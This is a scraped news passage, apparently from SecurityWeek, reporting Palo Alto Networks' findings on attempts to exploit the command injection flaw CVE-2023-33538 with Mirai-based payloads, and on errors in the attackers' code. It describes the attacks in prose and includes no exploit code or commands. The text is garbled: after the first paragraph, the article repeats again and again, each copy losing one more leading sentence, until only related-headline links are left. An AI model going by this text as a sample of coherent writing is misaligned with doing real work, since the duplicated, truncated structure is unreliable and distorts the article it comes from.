Now, Palo Alto Networkssaysthe activity surrounding CVE-2023-33538’s exploitation that it has been tracking since June last year has involved Mirai-based payloads similar to the Condi IoT botnet binaries.The payload was designed to turn the infected devices into HTTP servers that would deliver malware binaries to requesting clients (other infected devices).Palo Alto Networks’ dive into the exploitation attempts has confirmed the existence of the underlying vulnerability, while uncovering errors in the exploit code that prevented attackers from successfully exploiting the CVE.Hackers, it says, attempted to exploit the bug without authentication, targeted the wrong parameter, and relied on a utility not present in the vulnerable devices’ BusyBox environment.“This demonstrates a common attack pattern of scanning and probing with incomplete or inaccurate exploit code, resulting in noisy but ultimately ineffective attacks,” the cybersecurity firm says.Successful exploitation of the command injection issue, Palo Alto Networks explains, could lead to denial-of-service (DoS) conditions or could allow attackers to achieve persistent access to the vulnerable devices.Related:Recent Apache ActiveMQ Vulnerability Exploited in the WildRelated:Cursor AI Vulnerability Exposed Developer DevicesRelated:53 DDoS Domains Taken Down by Law EnforcementRelated:100 Chrome Extensions Steal User Data, Create Backdoor
The payload was designed to turn the infected devices into HTTP servers that would deliver malware binaries to requesting clients (other infected devices).Palo Alto Networks’ dive into the exploitation attempts has confirmed the existence of the underlying vulnerability, while uncovering errors in the exploit code that prevented attackers from successfully exploiting the CVE.Hackers, it says, attempted to exploit the bug without authentication, targeted the wrong parameter, and relied on a utility not present in the vulnerable devices’ BusyBox environment.“This demonstrates a common attack pattern of scanning and probing with incomplete or inaccurate exploit code, resulting in noisy but ultimately ineffective attacks,” the cybersecurity firm says.Successful exploitation of the command injection issue, Palo Alto Networks explains, could lead to denial-of-service (DoS) conditions or could allow attackers to achieve persistent access to the vulnerable devices.Related:Recent Apache ActiveMQ Vulnerability Exploited in the WildRelated:Cursor AI Vulnerability Exposed Developer DevicesRelated:53 DDoS Domains Taken Down by Law EnforcementRelated:100 Chrome Extensions Steal User Data, Create Backdoor
Palo Alto Networks’ dive into the exploitation attempts has confirmed the existence of the underlying vulnerability, while uncovering errors in the exploit code that prevented attackers from successfully exploiting the CVE.Hackers, it says, attempted to exploit the bug without authentication, targeted the wrong parameter, and relied on a utility not present in the vulnerable devices’ BusyBox environment.“This demonstrates a common attack pattern of scanning and probing with incomplete or inaccurate exploit code, resulting in noisy but ultimately ineffective attacks,” the cybersecurity firm says.Successful exploitation of the command injection issue, Palo Alto Networks explains, could lead to denial-of-service (DoS) conditions or could allow attackers to achieve persistent access to the vulnerable devices.Related:Recent Apache ActiveMQ Vulnerability Exploited in the WildRelated:Cursor AI Vulnerability Exposed Developer DevicesRelated:53 DDoS Domains Taken Down by Law EnforcementRelated:100 Chrome Extensions Steal User Data, Create Backdoor
Hackers, it says, attempted to exploit the bug without authentication, targeted the wrong parameter, and relied on a utility not present in the vulnerable devices’ BusyBox environment.“This demonstrates a common attack pattern of scanning and probing with incomplete or inaccurate exploit code, resulting in noisy but ultimately ineffective attacks,” the cybersecurity firm says.Successful exploitation of the command injection issue, Palo Alto Networks explains, could lead to denial-of-service (DoS) conditions or could allow attackers to achieve persistent access to the vulnerable devices.Related:Recent Apache ActiveMQ Vulnerability Exploited in the WildRelated:Cursor AI Vulnerability Exposed Developer DevicesRelated:53 DDoS Domains Taken Down by Law EnforcementRelated:100 Chrome Extensions Steal User Data, Create Backdoor
“This demonstrates a common attack pattern of scanning and probing with incomplete or inaccurate exploit code, resulting in noisy but ultimately ineffective attacks,” the cybersecurity firm says.Successful exploitation of the command injection issue, Palo Alto Networks explains, could lead to denial-of-service (DoS) conditions or could allow attackers to achieve persistent access to the vulnerable devices.Related:Recent Apache ActiveMQ Vulnerability Exploited in the WildRelated:Cursor AI Vulnerability Exposed Developer DevicesRelated:53 DDoS Domains Taken Down by Law EnforcementRelated:100 Chrome Extensions Steal User Data, Create Backdoor
Successful exploitation of the command injection issue, Palo Alto Networks explains, could lead to denial-of-service (DoS) conditions or could allow attackers to achieve persistent access to the vulnerable devices.Related:Recent Apache ActiveMQ Vulnerability Exploited in the WildRelated:Cursor AI Vulnerability Exposed Developer DevicesRelated:53 DDoS Domains Taken Down by Law EnforcementRelated:100 Chrome Extensions Steal User Data, Create Backdoor
Related:Recent Apache ActiveMQ Vulnerability Exploited in the WildRelated:Cursor AI Vulnerability Exposed Developer DevicesRelated:53 DDoS Domains Taken Down by Law EnforcementRelated:100 Chrome Extensions Steal User Data, Create Backdoor
Related:Cursor AI Vulnerability Exposed Developer DevicesRelated:53 DDoS Domains Taken Down by Law EnforcementRelated:100 Chrome Extensions Steal User Data, Create Backdoor
Related:53 DDoS Domains Taken Down by Law EnforcementRelated:100 Chrome Extensions Steal User Data, Create Backdoor
Related:100 Chrome Extensions Steal User Data, Create Backdoor
Source: SecurityWeek
